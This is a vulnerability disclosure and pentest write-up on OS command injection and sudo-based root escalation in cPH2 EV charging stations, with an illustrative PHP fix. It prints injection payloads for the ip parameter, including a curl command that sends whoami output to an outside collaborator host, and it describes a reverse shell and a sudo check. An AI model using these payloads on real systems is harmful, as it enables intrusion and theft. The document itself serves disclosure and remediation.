OS Command Injection in cPH2 Charging Station <2.0.0 (CVE-2023-46359 and CVE-2023-46360)

During a web application penetration test for one of our clients, we identified an OS Command Injection vulnerability in the cPH2 charging station produced by eCharge Hardy Barth GmbH.

The cPH2 charging station ships with a web interface through which an administrator can monitor and manage real-time usage, charge logs, firmware updates and configuration settings.

Configuration page
The vulnerable PHP page is not linked from the user interface, but inspecting the page source revealed the “/connectioncheck.php” endpoint, which takes an IP address as a parameter. It is evidently meant to test connectivity to the supplied IP, most likely by invoking a ping command, and an endpoint that passes user input to a system command in this way is a prime candidate for OS Command Injection.

Vulnerable endpoint discovered in the page source of /config.php
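To make the pattern concrete, here is an added illustration of what a connectivity-check handler such as /connectioncheck.php commonly looks like, with the insecure form beside a hardened one. This is not the vendor's code (the write-up does not show the real source of the endpoint); the ping invocation, the function names, the FAILED branch and the exact response format are assumptions, and the only facts taken from the write-up are the ip parameter and the “<ip> => <b>SUCCESS</b>” style of response.

```php
<?php
// Added illustration, not the eCharge/cPH2 code: the write-up does not show the
// real /connectioncheck.php. Assumptions: the check shells out to ping, the
// parameter arrives as ?ip=, and the page answers "<ip> => <b>SUCCESS</b>".

// Vulnerable pattern: the parameter is concatenated into a command line that
// exec() hands to /bin/sh -c, so "&&", ";", "|" and "$( )" are interpreted.
// With ip=127.0.0.1 && ${whoami}, ping succeeds and ${whoami} (a parameter
// expansion, not a command) expands to nothing, so the exit status is 0 and the
// page still prints SUCCESS without ever showing command output: blind injection.
function connectioncheck_vulnerable(string $ip): string
{
    exec("ping -c 1 -W 1 " . $ip, $output, $rc);
    return $ip . " => " . ($rc === 0 ? "<b>SUCCESS</b>" : "<b>FAILED</b>");
}

// Hardened pattern: allow-list the value as an IP literal before it gets
// anywhere near a shell, then quote it anyway (defence in depth).
// FILTER_VALIDATE_IP accepts only a bare IPv4/IPv6 address, so spaces, "&&",
// "$(" and a leading "-" (which could otherwise become an extra ping option)
// are rejected up front.
function validate_ip(string $ip): ?string
{
    $valid = filter_var(trim($ip), FILTER_VALIDATE_IP);
    return $valid === false ? null : $valid;
}

function connectioncheck_hardened(string $ip): string
{
    $valid = validate_ip($ip);
    if ($valid === null) {
        http_response_code(400);
        return "invalid ip";
    }
    // escapeshellarg() single-quotes the argument; after validation this is
    // belt and braces, but it means a future validator bug still cannot break
    // out of the argument. htmlspecialchars() stops the echoed value from
    // doubling as a reflected XSS.
    exec("ping -c 1 -W 1 " . escapeshellarg($valid), $output, $rc);
    return htmlspecialchars($valid, ENT_QUOTES, 'UTF-8') . " => "
        . ($rc === 0 ? "<b>SUCCESS</b>" : "<b>FAILED</b>");
}

// In the web handler you would call: echo connectioncheck_hardened($_GET['ip'] ?? '');
//
// Constructed probes (the write-up's two payloads plus a benign address); only
// the plain address survives validation. Run from the CLI: php connectioncheck.php
if (PHP_SAPI === 'cli') {
    $probes = [
        '127.0.0.1',
        '127.0.0.1 && ${whoami}',
        '127.0.0.1 && curl $(whoami).puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com',
    ];
    foreach ($probes as $probe) {
        printf("%-85s -> %s\n", $probe, validate_ip($probe) ?? 'rejected');
    }
}
```

The validation is the real fix; the quoting is insurance. If the code base runs on PHP 7.4 or later, proc_open() also accepts the command as an argv array, which bypasses /bin/sh entirely and removes the metacharacter problem at the root rather than by escaping.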

Using a straightforward payload such as ip=127.0.0.1 && ${whoami}, the server responds with 127.0.0.1 && ${whoami} => <b>SUCCESS</b>. The input is echoed back unmodified and the request still succeeds, which suggests the value reaches a shell unfiltered; however, the server only reports a status and never displays the output of the executed command, so the injection is blind. Note that ${whoami} is shell parameter expansion rather than command substitution, so this first probe only shows that the appended && sequence was tolerated; the $(whoami) form used in the next step is what actually runs a command.

To verify that the payload is executed and to extract data, we tried the out-of-band payload 127.0.0.1 && curl $(whoami).puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com and received both DNS and HTTP requests at our Burp Collaborator for the domain www-data.puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com. The www-data label in the resolved name is the output of whoami, which confirms that the command ran and that the web server executes as the www-data user.

DNS request received for the domain www-data.puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com

Having confirmed that our payload executes on the target device, we can deploy a payload that starts a reverse shell. This OS Command Injection vulnerability is tracked as CVE-2023-46359.

Reverse shell obtained as www-data

As the screenshot above shows, the service runs in the user context of www-data, and this user turns out to hold unnecessary privileges: it can execute sudo commands without a password (a quick check from the obtained shell is sudo -n -l, which lists the permitted commands without prompting). This misconfiguration turns the command injection into a full compromise, because an attacker in the www-data context can abuse the passwordless sudo to escalate to root and perform arbitrary actions on the system. This issue is tracked as CVE-2023-46360.

Both vulnerabilities affect every cPH2 Charging Station version prior to 2.0.0.

Affected customers are advised to update their systems to version 2.0.0 or later.

Originally published by Offensity: OS Command Injection in cPH2 Charging Station <2.0.0 (CVE-2023-46359 and CVE-2023-46360)

Posted by admin on 27 December 2023 at 4:36 PM.
